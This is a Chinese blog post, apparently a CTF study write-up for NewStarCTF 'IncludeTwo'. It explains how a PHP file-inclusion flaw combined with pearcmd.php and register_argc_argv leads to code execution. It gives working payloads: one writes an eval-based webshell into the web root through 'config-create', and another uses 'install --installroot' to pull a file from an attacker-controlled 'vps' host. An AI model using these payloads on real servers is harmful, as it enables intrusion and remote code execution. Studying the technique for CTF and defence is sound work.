

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=light>


<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-G582PR7P29"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-G582PR7P29');
</script>
<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="kivvs">
  <meta name="keywords" content="">
  
    <meta name="description" content="web安全之pearcmd.php的利用例题：[NewStarCTF 公开赛赛道]IncludeTwo 简介介绍 pecl是PHP中用于管理扩展而使用的命令行工具，而pear是pecl依赖的类库。在7.3及以前，pecl&#x2F;pear是默认安装的；在7.4及以后，需要我们在编译PHP的时候指定--with-pear才会安装。不过，在Docker任意版本镜像中，pcel&#x2F;pear都会">
<meta property="og:type" content="article">
<meta property="og:title" content="web安全之pearcmd.php的利用">
<meta property="og:url" content="https://kivvs.github.io/2026/08/14/web%E5%AE%89%E5%85%A8%E4%B9%8Bpearcmd-php%E7%9A%84%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="kivvs">
<meta property="og:description" content="web安全之pearcmd.php的利用例题：[NewStarCTF 公开赛赛道]IncludeTwo 简介介绍 pecl是PHP中用于管理扩展而使用的命令行工具，而pear是pecl依赖的类库。在7.3及以前，pecl&#x2F;pear是默认安装的；在7.4及以后，需要我们在编译PHP的时候指定--with-pear才会安装。不过，在Docker任意版本镜像中，pcel&#x2F;pear都会">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-08-14T09:32:44.000Z">
<meta property="article:modified_time" content="2026-08-14T09:33:04.249Z">
<meta property="article:author" content="kivvs">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>web安全之pearcmd.php的利用 - kivvs</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"kivvs.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null,"gtag":"G-G582PR7P29"},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  
    
  




  
<meta name="generator" content="Hexo 8.1.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>kivvs</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/categories/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-category-fill"></i>
                  <span>分类</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/tags/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-tags-fill"></i>
                  <span>标签</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-color-toggle-btn"
               data-label-light="开灯"
               data-label-dark="关灯">
            <a href="javascript:;" aria-label="Color Toggle">
              <div class="mobile-grid-item">
                <i class="iconfont icon-dark" id="mobile-color-toggle-icon"></i>
                <span id="mobile-color-toggle-label">关灯</span>
              </div>
            </a>
          </div>
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="web安全之pearcmd.php的利用"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-08-14 17:32" pubdate>
          2026年8月14日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          8.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          70 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">web安全之pearcmd.php的利用</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="web安全之pearcmd-php的利用"><a href="#web安全之pearcmd-php的利用" class="headerlink" title="web安全之pearcmd.php的利用"></a>web安全之pearcmd.php的利用</h1><p><strong>例题</strong>：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/notbad3/p/17687670.html">[NewStarCTF 公开赛赛道]IncludeTwo</a></p>
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><blockquote>
<p>pecl是PHP中用于管理扩展而使用的命令行工具，而pear是pecl依赖的类库。<br>在7.3及以前，pecl&#x2F;pear是默认安装的；<br>在7.4及以后，需要我们在编译PHP的时候指定<code>--with-pear</code>才会安装。<br>不过，在Docker任意版本镜像中，pcel&#x2F;pear都会被默认安装，安装的路径在<code>/usr/local/lib/php</code>。</p>
</blockquote>
<p>&emsp;&emsp;利用这个漏洞需要php开启register_argc_argv选项以及确定pearcmd.php的位置，正常pearcmd.php的位置是在&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php里面<br> 	<br>&emsp;&emsp;原本pear&#x2F;pcel是一个命令行工具，并不在Web目录下，即使存在一些安全隐患也无需担心。但我们遇到的场景比较特殊，是一个文件包含的场景，那么我们就可以包含到pear中的文件，进而利用其中的特性来搞事。  </p>
<h3 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h3><p>&emsp;&emsp;● &amp;符无法分割参数，真正能分割参数的是加号<br>&emsp;&emsp;● 等号无法赋值，而是会直接被传进去当作参数。</p>
<h3 id="前提"><a href="#前提" class="headerlink" title="前提"></a>前提</h3><p>&emsp;&emsp;● register_argc_argv&#x3D;on开启，在php.ini中可以开启<br>&emsp;&emsp;● 必须安装pecl&#x2F;pear，pecl是PHP用于管理扩展使用的命令工具，<br>&emsp;&emsp;<br>&emsp;&emsp;pecl是pear依赖的库类，在Docker任意的镜像版本中默认安装，安装路径为&#x2F;uer&#x2F;local&#x2F;lib&#x2F;php。</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>&emsp;&emsp;pear的默认安装路径为&#x2F;usr&#x2F; local &#x2F;lib&#x2F;php&#x2F;pear.php，<br>在命令行中可以使用pear和&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;pear.php运行，如果存在文件包含漏洞，则可以直接运行此命令。</p>
<blockquote>
<p>Docker环境下的PHP会开启register_argc_argv这个配置。当开启了这个选项，用户的输入将会被赋予给$argc、$argv、$_SERVER[‘argv’]几个变量。</p>
</blockquote>
<p>&emsp;&emsp;下面直接给出结论：<br><code>从&quot;URL/？&quot;后面的内容会全部传入到$_SERVER[&#39;argc&#39;]这个变量中，不管是否有等号存在。</code><br>&emsp;&emsp;即pear会在pearcmd.php中获取命令行参数。从下面<code>$argv = Console_Getopt::readPHPArgv();</code>我们也可以看出来</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs dns">PEAR_Comman<span class="hljs-number">d::</span>setFrontendType<span class="hljs-punctuation">(</span>&#x27;CLI&#x27;<span class="hljs-punctuation">)</span><span class="hljs-comment">;</span><br>$all_commands = PEAR_Comman<span class="hljs-number">d::</span>getCommands<span class="hljs-punctuation">(</span><span class="hljs-punctuation">)</span><span class="hljs-comment">;</span><br><br>$argv = Console_Getopt<span class="hljs-number">::</span>readPHPArgv<span class="hljs-punctuation">(</span><span class="hljs-punctuation">)</span><span class="hljs-comment">;</span><br>// fix CGI sapi oddity - the -- <span class="hljs-type">in</span> pear.bat/pear is not removed<br>if <span class="hljs-punctuation">(</span>php_sapi_name<span class="hljs-punctuation">(</span><span class="hljs-punctuation">)</span> != &#x27;cli&#x27; &amp;&amp; isset<span class="hljs-punctuation">(</span>$argv[<span class="hljs-number">1</span>]<span class="hljs-punctuation">)</span> &amp;&amp; $argv[<span class="hljs-number">1</span>] == &#x27;--&#x27;<span class="hljs-punctuation">)</span> &#123;<br>    unset<span class="hljs-punctuation">(</span>$argv[<span class="hljs-number">1</span>]<span class="hljs-punctuation">)</span><span class="hljs-comment">;</span><br>    $argv = array_values<span class="hljs-punctuation">(</span>$argv<span class="hljs-punctuation">)</span><span class="hljs-comment">;</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>&emsp;&emsp;那么这是个什么样的参数呢？我们究竟如何通过它去执行文件包含呢？</p>
<p>&emsp;&emsp;那么接下来我们分析一下这个参数$_SERVER[‘argv’]的作用  </p>
<figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs haxe"><span class="hljs-meta"># 当我们开启register_argc_argv选项的时候，$_SERVER[‘argv’]就会生效。</span><br><span class="hljs-meta"># peracmd.php获取参数的代码：</span><br><span class="hljs-meta"># 这个代码存在于/Console/Getopt.php文件中</span><br>  <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-title function_"><span class="hljs-keyword">function</span> <span class="hljs-title">readPHPArgv</span></span>()<br>&#123;<br>  global <span class="hljs-variable">$argv</span>;<br>  <span class="hljs-keyword">if</span> (!is_array(<span class="hljs-variable">$argv</span>)) &#123;<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-meta">@is_array</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;argv&#x27;</span>])) &#123;<br>      <span class="hljs-keyword">if</span> (!<span class="hljs-meta">@is_array</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;HTTP_SERVER_VARS&#x27;</span>][<span class="hljs-string">&#x27;argv&#x27;</span>])) &#123;<br>        <span class="hljs-variable">$msg</span> = <span class="hljs-string">&quot;Could not read cmd args (register_argc_argv=Off?)&quot;</span>;<br>        <span class="hljs-keyword">return</span> PEAR:<span class="hljs-type"></span>:raiseError(<span class="hljs-string">&quot;Console_Getopt: &quot;</span> . <span class="hljs-variable">$msg</span>);<br>      &#125;<br>      <span class="hljs-keyword">return</span> <span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;HTTP_SERVER_VARS&#x27;</span>][<span class="hljs-string">&#x27;argv&#x27;</span>];<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;argv&#x27;</span>];<br>  &#125;<br>  <span class="hljs-keyword">return</span> <span class="hljs-variable">$argv</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>&emsp;&emsp;这里会先尝试$argv，如果不存在再尝试$_SERVER[‘argv’]，后者我们可通过query-string控制。也就是说，我们通过Web访问了pear命令行的功能，且能够控制命令行的参数  </p>
<h3 id="命令参数"><a href="#命令参数" class="headerlink" title="命令参数"></a>命令参数</h3><p>&emsp;&emsp;接下来，我们看看 pear中有哪些可以利用的参数：  </p>
<details style="border: 1px solid #d0e8ff; border-radius: 8px; background: #f0f7ff; padding: 10px; margin: 15px 0;">
<summary style="display: flex; align-items: center; gap: 8px; font-size: 14px; font-weight: bold; cursor: pointer;">
  <span style="font-family: monospace;">>>></span>
  点击查看命令参数
</summary>


<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><code class="hljs dart"><span class="hljs-title class_">Commands</span>:<br>build                  <span class="hljs-title class_">Build</span> an <span class="hljs-title class_">Extension</span> <span class="hljs-title class_">From</span> C <span class="hljs-title class_">Source</span><br>bundle                 <span class="hljs-title class_">Unpacks</span> a <span class="hljs-title class_">Pecl</span> <span class="hljs-title class_">Package</span><br>channel-add            <span class="hljs-title class_">Add</span> a <span class="hljs-title class_">Channel</span><br>channel-alias          <span class="hljs-title class_">Specify</span> an alias to a channel name<br>channel-delete         <span class="hljs-title class_">Remove</span> a <span class="hljs-title class_">Channel</span> <span class="hljs-title class_">From</span> the <span class="hljs-title class_">List</span><br>channel-discover       <span class="hljs-title class_">Initialize</span> a <span class="hljs-title class_">Channel</span> from its server<br>channel-info           <span class="hljs-title class_">Retrieve</span> <span class="hljs-title class_">Information</span> <span class="hljs-keyword">on</span> a <span class="hljs-title class_">Channel</span><br>channel-login          <span class="hljs-title class_">Connects</span> and authenticates to remote channel server<br>channel-logout         <span class="hljs-title class_">Logs</span> out from the remote channel server<br>channel-update         <span class="hljs-title class_">Update</span> an <span class="hljs-title class_">Existing</span> <span class="hljs-title class_">Channel</span><br>clear-cache            <span class="hljs-title class_">Clear</span> <span class="hljs-title class_">Web</span> <span class="hljs-title class_">Services</span> <span class="hljs-title class_">Cache</span><br>config-create          <span class="hljs-title class_">Create</span> a <span class="hljs-title class_">Default</span> configuration file<br>config-<span class="hljs-keyword">get</span>             <span class="hljs-title class_">Show</span> <span class="hljs-title class_">One</span> <span class="hljs-title class_">Setting</span><br>config-help            <span class="hljs-title class_">Show</span> <span class="hljs-title class_">Information</span> <span class="hljs-title class_">About</span> <span class="hljs-title class_">Setting</span><br>config-<span class="hljs-keyword">set</span>             <span class="hljs-title class_">Change</span> <span class="hljs-title class_">Setting</span><br>config-<span class="hljs-keyword">show</span>            <span class="hljs-title class_">Show</span> <span class="hljs-title class_">All</span> <span class="hljs-title class_">Settings</span><br>convert                <span class="hljs-title class_">Convert</span> a package.xml <span class="hljs-number">1.0</span> to package.xml <span class="hljs-number">2.0</span> format<br>cvsdiff                <span class="hljs-title class_">Run</span> a <span class="hljs-string">&quot;cvs diff&quot;</span> <span class="hljs-keyword">for</span> all files <span class="hljs-keyword">in</span> a package<br>cvstag                 <span class="hljs-title class_">Set</span> CVS <span class="hljs-title class_">Release</span> <span class="hljs-title class_">Tag</span><br>download               <span class="hljs-title class_">Download</span> <span class="hljs-title class_">Package</span><br>download-all           <span class="hljs-title class_">Downloads</span> each available package from the <span class="hljs-keyword">default</span> channel<br>info                   <span class="hljs-title class_">Display</span> information about a package<br>install                <span class="hljs-title class_">Install</span> <span class="hljs-title class_">Package</span><br>list                   <span class="hljs-title class_">List</span> <span class="hljs-title class_">Installed</span> <span class="hljs-title class_">Packages</span> <span class="hljs-title class_">In</span> <span class="hljs-title class_">The</span> <span class="hljs-title class_">Default</span> <span class="hljs-title class_">Channel</span><br>list-all               <span class="hljs-title class_">List</span> <span class="hljs-title class_">All</span> <span class="hljs-title class_">Packages</span><br>list-channels          <span class="hljs-title class_">List</span> <span class="hljs-title class_">Available</span> <span class="hljs-title class_">Channels</span><br>list-files             <span class="hljs-title class_">List</span> <span class="hljs-title class_">Files</span> <span class="hljs-title class_">In</span> <span class="hljs-title class_">Installed</span> <span class="hljs-title class_">Package</span><br>list-upgrades          <span class="hljs-title class_">List</span> <span class="hljs-title class_">Available</span> <span class="hljs-title class_">Upgrades</span><br>login                  <span class="hljs-title class_">Connects</span> and authenticates to remote server [<span class="hljs-title class_">Deprecated</span> <span class="hljs-keyword">in</span> favor of channel-login]<br>logout                 <span class="hljs-title class_">Logs</span> out from the remote server [<span class="hljs-title class_">Deprecated</span> <span class="hljs-keyword">in</span> favor of channel-logout]<br>makerpm                <span class="hljs-title class_">Builds</span> an RPM spec file from a PEAR package<br>package                <span class="hljs-title class_">Build</span> <span class="hljs-title class_">Package</span><br>package-dependencies   <span class="hljs-title class_">Show</span> package dependencies<br>package-validate       <span class="hljs-title class_">Validate</span> <span class="hljs-title class_">Package</span> <span class="hljs-title class_">Consistency</span><br>pickle                 <span class="hljs-title class_">Build</span> PECL <span class="hljs-title class_">Package</span><br>remote-info            <span class="hljs-title class_">Information</span> <span class="hljs-title class_">About</span> <span class="hljs-title class_">Remote</span> <span class="hljs-title class_">Packages</span><br>remote-list            <span class="hljs-title class_">List</span> <span class="hljs-title class_">Remote</span> <span class="hljs-title class_">Packages</span><br>run-scripts            <span class="hljs-title class_">Run</span> <span class="hljs-title class_">Post</span>-<span class="hljs-title class_">Install</span> <span class="hljs-title class_">Scripts</span> bundled <span class="hljs-keyword">with</span> a package<br>run-tests              <span class="hljs-title class_">Run</span> <span class="hljs-title class_">Regression</span> <span class="hljs-title class_">Tests</span><br>search                 <span class="hljs-title class_">Search</span> remote package database<br>shell-test             <span class="hljs-title class_">Shell</span> <span class="hljs-title class_">Script</span> <span class="hljs-title class_">Test</span><br>sign                   <span class="hljs-title class_">Sign</span> a package distribution file<br>svntag                 <span class="hljs-title class_">Set</span> SVN <span class="hljs-title class_">Release</span> <span class="hljs-title class_">Tag</span><br>uninstall              <span class="hljs-title class_">Un</span>-install <span class="hljs-title class_">Package</span><br>update-channels        <span class="hljs-title class_">Update</span> the <span class="hljs-title class_">Channel</span> <span class="hljs-title class_">List</span><br>upgrade                <span class="hljs-title class_">Upgrade</span> <span class="hljs-title class_">Package</span><br>upgrade-all            <span class="hljs-title class_">Upgrade</span> <span class="hljs-title class_">All</span> <span class="hljs-title class_">Packages</span> [<span class="hljs-title class_">Deprecated</span> <span class="hljs-keyword">in</span> favor of calling upgrade <span class="hljs-keyword">with</span> no parameters]<br><span class="hljs-title class_">Usage</span>: pear [options] command [command-options] &lt;parameters&gt;<br><span class="hljs-title class_">Type</span> <span class="hljs-string">&quot;pear help options&quot;</span> to list all options.<br><span class="hljs-title class_">Type</span> <span class="hljs-string">&quot;pear help shortcuts&quot;</span> to list all command shortcuts.<br><span class="hljs-title class_">Type</span> <span class="hljs-string">&quot;pear help version&quot;</span> or <span class="hljs-string">&quot;pear version&quot;</span> to list version information.<br><span class="hljs-title class_">Type</span> <span class="hljs-string">&quot;pear help &lt;command&gt;&quot;</span> to <span class="hljs-keyword">get</span> the help <span class="hljs-keyword">for</span> the specified command.<br><br></code></pre></td></tr></table></figure>
</details>
&emsp;&emsp;这里我们重点介绍config-create、install、download三种命令参数
 
<h4 id="config-create—–创建一个默认配置文件"><a href="#config-create—–创建一个默认配置文件" class="headerlink" title="config-create—–创建一个默认配置文件"></a>config-create—–创建一个默认配置文件</h4><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs n1ql">config-<span class="hljs-keyword">create</span>: must have <span class="hljs-number">2</span> parameters, root <span class="hljs-keyword">path</span> <span class="hljs-keyword">and</span> filename <span class="hljs-keyword">to</span> save <span class="hljs-keyword">as</span><br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;必须传入两个参数，第一个为绝对路径，第二个为创建文件的文件名。注意传入的内容是通过+来作为分隔符的。即空格经过url编码后+，我们尝试一段命令</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby">pear config-create /&lt;<span class="hljs-string">?=</span><span class="hljs-variable">@eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);<span class="hljs-string">?&gt;</span> /tmp/shell.php<br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;可以发现成功写入，我们现在解释上面的命令，在插入内容<?=@eval($_POST[1]);?>前加上&#x2F;目的是引入绝对路径，后面为创建文件的文件保存地址和文件名。</p>
<p>&emsp;&emsp;值得注意的是，上面的命令并不适用与 文件包含 的格式来写入shell,由于$_SERVER[‘argv’]变量会将URL的?后面的值都传入pear当作参数，所以此处file需要调换一下位置，并且在适当位置加上&#x2F;和+，所以我们更改代码</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-string">?+</span>config-create+<span class="hljs-regexp">/usr/local</span><span class="hljs-regexp">/lib/php</span><span class="hljs-regexp">/pearcmd.php&amp;/</span>&lt;<span class="hljs-string">?=</span>eval(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);<span class="hljs-string">?&gt;</span>+<span class="hljs-regexp">/var/www</span><span class="hljs-regexp">/html/shell</span>.php<br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;上述代码会将&#x2F;&amp;file&#x3D;&#x2F;usr&#x2F;share&#x2F;php&#x2F;pearcmd.php&amp;&#x2F;<?=@eval($_POST[1]);?>作为一个目录，也就是第一个参数，将其shell写入&#x2F;var&#x2F;www&#x2F;html&#x2F;shell.php，然后再包含这个文件。</p>
<h4 id="install—–安装一个包"><a href="#install—–安装一个包" class="headerlink" title="install—–安装一个包"></a>install—–安装一个包</h4><p>&emsp;&emsp;我们可以使用命令下载服务器上的phpinfo.php文件 </p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs 1c">pear install http<span class="hljs-punctuation">:</span><span class="hljs-comment">//vps/phpinfo.php</span><br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;如果我们需要配合文件包含漏洞，还需要了解一个参数–<strong>installroot</strong>，这个选项可以指定安装目录，这样就可以构建payload远程下载文件了；</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">?<span class="hljs-code">+install+</span>--installroot<span class="hljs-code">+&amp;file=/usr/local/bin/php/pearcmd.php&amp;+</span><span class="hljs-link">http://</span>[<span class="hljs-string">vps</span>]/index.php<br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;这条指令可以将服务器上的index.php下载到&amp;file&#x3D;&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;pearcmd.php&amp;&#x2F;tmp&#x2F;pear&#x2F;download&#x2F;目录下（后面要拼接上&#x2F;tmp&#x2F;pear&#x2F;download&#x2F;）</p>
